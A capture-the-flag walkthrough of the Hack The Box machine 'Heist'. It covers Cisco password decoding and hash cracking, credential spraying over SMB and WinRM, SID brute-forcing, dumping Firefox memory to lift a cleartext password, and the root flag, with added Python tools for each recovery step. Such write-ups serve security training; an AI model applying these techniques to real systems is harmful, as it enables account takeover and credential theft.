
Hack The Box - Heist

Heist was an easy box built around password recovery and dumping Firefox's process memory. A Cisco router configuration file, left as an attachment on the support portal, contained usernames and password hashes. After recovering the passwords, one of them worked for SMB/RPC access as Hazard, and brute-forcing SIDs over RPC gave us more usernames. One of those users, Chase, accepted a recovered password over WinRM. On the box we found Firefox running, dumped its process memory and recovered the password for the support portal, which also happened to be the local Administrator's password.

RECON

NMAP

Starting with nmap, it shows a few ports open.

  • Port 80: Microsoft IIS httpd 10.0
  • Port 135: Microsoft Windows RPC
  • Port 445: SMB
  • Port 5985: WinRM
  • Port 49669: Microsoft Windows RPC (ephemeral RPC endpoint)
$sudo nmap -sC -sV -p- --min-rate 10000 -oN Heist-all-tcp.nmap 10.10.10.149 
[sudo] password for niraz: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 07:32 +0545 
Nmap scan report for 10.10.10.149 
Host is up (0.079s latency). 
Not shown: 65530 filtered tcp ports (no-response) 
PORT      STATE SERVICE       VERSION 
80/tcp    open  http          Microsoft IIS httpd 10.0 
| http-methods: 
|_  Potentially risky methods: TRACE 
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set 
| http-title: Support Login Page 
|_Requested resource was login.php 
|_http-server-header: Microsoft-IIS/10.0 
135/tcp   open  msrpc         Microsoft Windows RPC 
445/tcp   open  microsoft-ds? 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found 
|_http-server-header: Microsoft-HTTPAPI/2.0 
49669/tcp open  msrpc         Microsoft Windows RPC 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 
Host script results: 
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required 
| smb2-time: 
|   date: 2023-01-09T01:49:00 
|_  start_date: N/A 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 109.73 seconds

WEB - ENUMERATION

The site presents a login form.

Trying some basic email and password combinations did not work.

LOGIN AS GUEST

After logging in as guest, we can see it's some kind of support portal, and a user named hazard has uploaded a Cisco router configuration file as an attachment. We can view the configuration file.

version 12.2 
no service pad 
service password-encryption 
! 
isdn switch-type basic-5ess 
! 
hostname ios-1 
! 
security passwords min-length 12 
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 
! 
username rout3r password 7 0242114B0E143F015F5D1E161713 
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 
! 
! 
ip ssh authentication-retries 5 
ip ssh version 2 
! 
! 
router bgp 100 
 synchronization 
 bgp log-neighbor-changes 
 bgp dampening 
 network 192.168.0.0 mask 300.255.255.0 
 timers bgp 3 9 
 redistribute connected 
! 
ip classless 
ip route 0.0.0.0 0.0.0.0 192.168.0.1 
! 
! 
access-list 101 permit ip any any 
dialer-list 1 protocol ip list 101 
! 
no ip http server 
no ip http secure-server 
! 
line vty 0 4 
 session-timeout 600 
 authorization exec SSH 
 transport input ssh

From the above configuration file we can pull out three credential strings. Only the enable secret is a real hash; the two Type 7 strings are reversible obfuscation, not hashes.

Hash                                  Hash Type
$1$pdQG$o8nrSzsGXeaduXrjlvKc91        Cisco Type 5 (salted MD5, md5crypt)
0242114B0E143F015F5D1E161713          Cisco Type 7 (reversible)
02375012182C1A1D751618034F36415408    Cisco Type 7 (reversible)

TYPE 7 DECRYPT

Type 7 passwords are not hashed, only XORed with a fixed, publicly known key, so any of the many online Type 7 decoders (or a few lines of code) recovers them instantly with no wordlist. Decoding both strings gives:

0242114B0E143F015F5D1E161713: $uperP@ssword
02375012182C1A1D751618034F36415408:  Q4)sJu\Y8qz*A3?d
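Rather than trusting an online decoder with credentials, here is the Type 7 scheme implemented directly. This is an added example, not code from the original post: the first two characters of the string are a decimal seed (offset into Cisco's fixed key), and every following hex byte is XORed with successive key bytes. The config lines used as input are the two username lines from the router config above.

```python
"""Cisco Type 7 password decoder/encoder (added example).

Type 7 is not a hash: each byte of the password is XORed with a byte of a fixed,
publicly known key.  The first two characters of the string are a decimal seed
(offset into the key); the rest is the XORed bytes as uppercase hex.
"""
import re

# The fixed key Cisco IOS uses for "service password-encryption" (Type 7).
XLAT_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decrypt(encoded: str) -> str:
    """Recover the plaintext from a Type 7 string such as '0242114B0E143F...'."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 != 0:
        raise ValueError("Type 7 string must be an even number of hex digits, at least 4")
    seed = int(encoded[:2], 10)          # offset into XLAT_KEY
    body = bytes.fromhex(encoded[2:])    # the XORed password bytes
    plain = bytes(c ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, c in enumerate(body))
    return plain.decode("latin-1")


def type7_encrypt(plain: str, seed: int = 2) -> str:
    """Inverse of type7_decrypt; handy to confirm a decoded value round-trips."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    data = plain.encode("latin-1")
    body = bytes(c ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, c in enumerate(data))
    return f"{seed:02d}" + body.hex().upper()


def type7_from_config(config_text: str) -> dict:
    """Find 'username X [privilege N] password 7 HEX' lines, return {user: plaintext}."""
    pattern = re.compile(
        r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+7\s+([0-9A-Fa-f]+)\s*$",
        re.M,
    )
    return {m.group(1): type7_decrypt(m.group(2)) for m in pattern.finditer(config_text)}


# The two Type 7 lines from the router configuration shown above.
SAMPLE_CONFIG = """\
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for user, password in type7_from_config(SAMPLE_CONFIG).items():
        print(f"{user}: {password}")
```

Run it against the full config file (`type7_from_config(open("config.txt").read())`) and it prints both usernames with their plaintext passwords; the round-trip through type7_encrypt is the check that a decoder actually implemented the scheme rather than guessing.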

TYPE 5 CRACK

Type 5 is md5crypt ($1$), a salted and iterated hash, so it cannot be reversed like Type 7; we have to guess candidates. Using hashcat in mode 500 against rockyou:

$hashcat -m 500 hash /usr/share/wordlists/rockyou.txt

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent  
Session..........: hashcat  
Status...........: Cracked  
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)  
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91  
Time.Started.....: Mon Jan  9 08:11:22 2023 (8 mins, 46 secs)  
Time.Estimated...: Mon Jan  9 08:20:08 2023 (0 secs)  
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)  
Guess.Queue......: 1/1 (100.00%)  
Speed.#1.........:     6644 H/s (20.35ms) @ Accel:256 Loops:250 Thr:1 Vec:16  
Recovered........: 1/1 (100.00%) Digests  
Progress.........: 3543552/14344385 (24.70%)  
Rejected.........: 0/3543552 (0.00%)  
Restore.Point....: 3543040/14344385 (24.70%)  
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000  
Candidates.#1....: steauara -> steakdi
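To make the difference from Type 7 concrete, here is the md5crypt scheme behind a Type 5 secret written out, with a check function that does what hashcat does for a single candidate. This is an added example, not the post's code: the algorithm is the standard FreeBSD md5crypt ($1$) that Cisco reuses, ENABLE_SECRET is the value from the config above, and the three-word list stands in for rockyou.txt.

```python
"""Check a candidate password against a Cisco Type 5 ($1$, md5crypt) secret (added example).

Unlike Type 7, Type 5 is a real salted, iterated hash (1000 MD5 rounds), so there
is nothing to "decrypt": a candidate is re-hashed with the stored salt and
compared, which is exactly what hashcat -m 500 does at scale.
"""
import hashlib
import hmac

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """md5crypt's custom base64: emits `count` characters, low 6 bits first."""
    out = []
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Return the full '$1$salt$hash' string for password and (up to 8 char) salt."""
    pw = password.encode("utf-8")
    salt_b = salt.encode("utf-8")[:8]
    magic = b"$1$"

    # Alternate sum MD5(pw + salt + pw), mixed into the main context once per pw byte.
    alt = hashlib.md5(pw + salt_b + pw).digest()
    ctx = hashlib.md5(pw + magic + salt_b)
    for i in range(len(pw)):
        ctx.update(alt[i % 16:i % 16 + 1])

    # For each bit of len(pw): append a NUL byte (bit set) or the first pw byte (bit clear).
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 rounds of stretching with a fixed, deliberately irregular mixing pattern.
    for r in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if r & 1 else final)
        if r % 3:
            ctx.update(salt_b)
        if r % 7:
            ctx.update(pw)
        ctx.update(final if r & 1 else pw)
        final = ctx.digest()

    # Encode the 16 digest bytes in md5crypt's scrambled byte order.
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return f"$1${salt_b.decode()}${out}"


def check_type5(candidate: str, secret: str) -> bool:
    """True if `candidate` is the password behind a Cisco 'enable secret 5' string."""
    parts = secret.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not a $1$ (md5crypt / Cisco Type 5) string")
    return hmac.compare_digest(md5crypt(candidate, parts[2]), secret)


def crack_type5(secret: str, wordlist):
    """Minimal wordlist attack: return the first matching candidate, else None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_type5(word, secret):
            return word
    return None


# The enable secret from the router configuration above.
ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"

if __name__ == "__main__":
    # Constructed three-word list standing in for rockyou.txt.
    print(crack_type5(ENABLE_SECRET, ["password", "cisco", "stealth1agent"]))
```

Pure Python manages a few thousand candidates per second here, which is why hashcat (or John) is the right tool for a real wordlist; the point of the block is that every guess costs 1000 MD5 calls over password and salt, so the recovered value depends entirely on the password being in the list.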

Now we have a few usernames and passwords. One caveat: the second line of passwords.txt reads @sswordf rather than $uperP@ssword, so the full decoded rout3r password is never actually tried in the sprays that follow. An unquoted $uperP... is subject to shell variable expansion, so quote the value when writing it to the file.

$cat usernames.txt 
admin 
rout3r 
Hazard 

$cat passwords.txt 
Q4)sJu\Y8qz*A3?d 
@sswordf 
stealth1agent

SMB - TCP 445

Without creds:

$smbmap -H 10.10.10.149 
[!] Authentication error on 10.10.10.149

smbmap gives an authentication error, meaning null sessions are refused and we need valid creds to list the shares.

CRACKMAPEXEC

Using crackmapexec we can pass a list of usernames and a list of passwords, and it tries every combination against SMB. We'll use the creds gathered so far; --shares also lists the shares for any hit.

$cme smb -u usernames.txt -p passwords.txt --shares 10.10.10.149 
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:@sswordf STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [+] Enumerated shares 
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark 
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------ 
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin 
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share 
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

We found valid creds: Hazard:stealth1agent. Re-running smbmap with them shows no readable file shares, only IPC$. That is still useful: IPC$ gives access to the named pipes (lsarpc, samr) that rpcclient and lookupsid use next.

$smbmap -u hazard -p stealth1agent -H 10.10.10.149 
[+] IP: 10.10.10.149:445        Name: 10.10.10.149 
        Disk                                                    Permissions     Comment 
        ----                                                    -----------     ------- 
        ADMIN$                                                  NO ACCESS       Remote Admin 
        C$                                                      NO ACCESS       Default share 
        IPC$                                                    READ ONLY       Remote IPC

RPCCLIENT

$rpcclient -U 'hazard%stealth1agent' 10.10.10.149

We can get the SID of a user we know using lookupnames.

rpcclient $> lookupnames hazard 
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

We can also resolve a SID back to an account name with lookupsids.

rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

rpcclient's -c option runs a command non-interactively, which lets us loop over RIDs from the shell and brute-force SIDs. The machine SID is everything up to the last hyphen; the trailing number is the RID, which is what we iterate (local user accounts normally start at 1000).

$rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c 'lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008' 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

$for i in {1000..1050};do rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown;done 
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1) 
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1) 
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1) 
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)

impacket-lookupsid does the same SID brute-force in one go, and also returns the built-in accounts below RID 1000:

$impacket-lookupsid hazard:stealth1agent@10.10.10.149 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation 
[*] Brute forcing SIDs at 10.10.10.149 
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 
500: SUPPORTDESK\Administrator (SidTypeUser) 
501: SUPPORTDESK\Guest (SidTypeUser) 
503: SUPPORTDESK\DefaultAccount (SidTypeUser) 
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 
513: SUPPORTDESK\None (SidTypeGroup) 
1008: SUPPORTDESK\Hazard (SidTypeUser) 
1009: SUPPORTDESK\support (SidTypeUser) 
1012: SUPPORTDESK\Chase (SidTypeUser) 
1013: SUPPORTDESK\Jason (SidTypeUser)

We now have a few more users. Updating our usernames file:

$cat usernames.txt 
admin 
rout3r 
Hazard 
Administrator 
Guest 
support 
chase 
Jason

SHELL AS CHASE

METASPLOIT

Using Metasploit's auxiliary/scanner/winrm/winrm_login module to spray the usernames and passwords we have against WinRM.

[msf](Jobs:0 Agents:0) auxiliary(scanner/winrm/winrm_login) >> show options 
Module options (auxiliary/scanner/winrm/winrm_login): 
   Name              Current Setting  Required  Description 
   ----              ---------------  --------  ----------- 
   BLANK_PASSWORDS   false            no        Try blank passwords for all users 
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5 
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database 
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list 
   DB_ALL_USERS      false            no        Add all users in the current database to the list 
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm) 
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification 
   PASSWORD                           no        A specific password to authenticate with 
   PASS_FILE         passwords.txt    no        File containing passwords, one per line 
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...] 
   RHOSTS            10.10.10.149     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit 
   RPORT             5985             yes       The target port (TCP) 
   SSL               false            no        Negotiate SSL/TLS for outgoing connections 
   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host 
   THREADS           1                yes       The number of concurrent threads (max one per host) 
   URI               /wsman           yes       The URI of the WinRM service 
   USERNAME                           no        A specific username to authenticate as 
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line 
   USER_AS_PASS      false            no        Try the username as the password for all users 
   USER_FILE         usernames.txt    no        File containing usernames, one per line 
   VERBOSE           true             yes       Whether to print output for all attempts 
   VHOST                              no        HTTP server virtual host 
[msf](Jobs:0 Agents:0) auxiliary(scanner/winrm/winrm_login) >> run 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: ) 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:@sswordf (Incorrect: ) 
[-] 10.10.10.149: - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: ) 
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d

So chase can authenticate over WinRM, reusing the decoded Type 7 password of the router's admin user. Using evil-winrm to get a shell:

$evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d" 
Evil-WinRM shell v3.4 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\Chase\Documents>

SHELL AS ADMINISTRATOR

There's a to-do list on Chase's desktop that says to keep checking the issues list, which is done in a browser against the support portal we found earlier. That hints that Chase has a live browser session on the box.

*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt 
Stuff to-do: 
1. Keep checking the issues list. 
2. Fix the router config. 
Done: 
1. Restricted access for guest user.

Running ps we can see a bunch of firefox processes (Firefox is multi-process, so a single browser window shows up as several firefox.exe).

*Evil-WinRM* PS C:\Users\Chase\Desktop> ps 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName 
-------  ------    -----      -----     ------     --  -- ----------- 
    347      19    10232     287536       0.17    740   1 firefox 
    401      34    39024      96248       2.30   2944   1 firefox
   1065      71   149328     227156       8.34   3916   1 firefox
    378      28    23692      60496       1.33   5876   1 firefox
    356      25    16528      39016       0.17   6408   1 firefox

GET CREDS FROM FIREFOX

Using procdump from Sysinternals to take a full memory dump (-ma) of one of the firefox processes. Upload the binary first, then run it against a PID from the ps output; if the first dump doesn't contain what we're after, the other PIDs can be dumped the same way.

*Evil-WinRM* PS C:\Users\Chase\Documents> upload procdump64.exe
Info: Uploading procdump64.exe to C:\Users\Chase\Documents\procdump64.exe


Data: 566472 bytes of 566472 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64 -ma 740 -accepteula

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[20:49:10] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_230129_204910.dmp
[20:49:10] Dump 1 writing: Estimated dump file size is 288 MB.
[20:49:10] Dump 1 complete: 288 MB written in 0.4 seconds
[20:49:10] Dump count reached.

Downloading the dump:

*Evil-WinRM* PS C:\Users\Chase\Documents> download firefox.exe_230129_204910.dmp

strings and grep pull the password straight out of the dump file. The hit is in MOZ_CRASHREPORTER_RESTART_ARG_1, an environment variable Firefox fills with the URL it would reopen after a crash: the portal's login form submits login_username and login_password in the URL query string, so the credentials sit in process memory in cleartext.

$strings firefox.exe_230129_204910.dmp | grep password=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
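The strings-and-grep step is quick but leaves us eyeballing a query string. Below is an added example, not code from the original post, that does the same extraction programmatically: it reproduces the strings(1) heuristic over the raw dump, finds any URL carrying a password-like parameter, and decodes the query string with urllib so percent-encoding is handled and duplicate hits (the same URL appears several times in the real dump) collapse to one. The sample dump bytes are constructed for the example and model the MOZ_CRASHREPORTER_RESTART_ARG_1 line above; the username in it is a placeholder, not the one from the box.

```python
"""Pull URL-embedded credentials out of a process memory dump (added example).

Firefox keeps the current page URL in the MOZ_CRASHREPORTER_RESTART_ARG_1
environment variable, so a login form that submits credentials in the query
string leaves them in cleartext in the browser's memory.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Anything that looks like a host[/path]?query, with or without a scheme.
_URL_WITH_QUERY = re.compile(r"((?:https?://)?[\w.-]+(?:/[^\s?]*)?\?[^\s\"'<>]+)")


def extract_strings(data: bytes, min_len: int = 4):
    """Yield printable-ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in pattern.finditer(data):
        yield m.group().decode("ascii")


def find_credentials(data: bytes, key_hint: str = "password"):
    """Return de-duplicated {param: value} dicts for every URL whose query has a password-like key."""
    seen = set()
    results = []
    for s in extract_strings(data):
        if key_hint not in s.lower():
            continue                      # cheap pre-filter, same job as grep
        for url in _URL_WITH_QUERY.findall(s):
            if "://" not in url:
                url = "http://" + url     # urlsplit needs a scheme to find the query
            params = parse_qs(urlsplit(url).query, keep_blank_values=True)
            flat = {k: v[0] for k, v in params.items()}
            if not any(key_hint in k.lower() for k in flat):
                continue                  # "password" matched outside the query
            fingerprint = tuple(sorted(flat.items()))
            if fingerprint not in seen:
                seen.add(fingerprint)
                results.append(flat)
    return results


# Constructed sample: junk bytes around lines modelled on the real dump, including
# a truncated duplicate of the URL (as strings output showed) and a non-URL hit.
SAMPLE_DUMP = (
    b"\x00\x00MZ\x90\x00\xff\xfe"
    b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?"
    b"login_username=admin%40example.test&login_password=4dD!5}x/re8]FBuZ&login="
    b"\x00\x01\x02"
    b"RG_1=localhost/login.php?"
    b"login_username=admin%40example.test&login_password=4dD!5}x/re8]FBuZ&login=\x00"
    b'label-password="&fillPasswordMenu.label;"\x00'
    b"MOZ_CRASHREPORTER_RESTART_ARG_0=C:\\Program Files\\Mozilla Firefox\\firefox.exe\x00"
)

if __name__ == "__main__":
    for creds in find_credentials(SAMPLE_DUMP):
        for key, value in creds.items():
            print(f"{key} = {value!r}")
```

On the real file, call find_credentials(open("firefox.exe_230129_204910.dmp", "rb").read()); a 288 MB dump fits in memory comfortably, and the pre-filter on the key hint keeps the URL regex off the bulk of the strings. Because the credentials come from an environment variable, they survive for the lifetime of the process, not just while the login page is open.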

The same password is the local Administrator's, and we get a shell as administrator over WinRM:

$evil-winrm -i 10.10.10.149 -u administrator  -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
supportdesk\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
caf30de94a7ba38168831b756dee6dea

This post is licensed under CC BY 4.0 by the author.
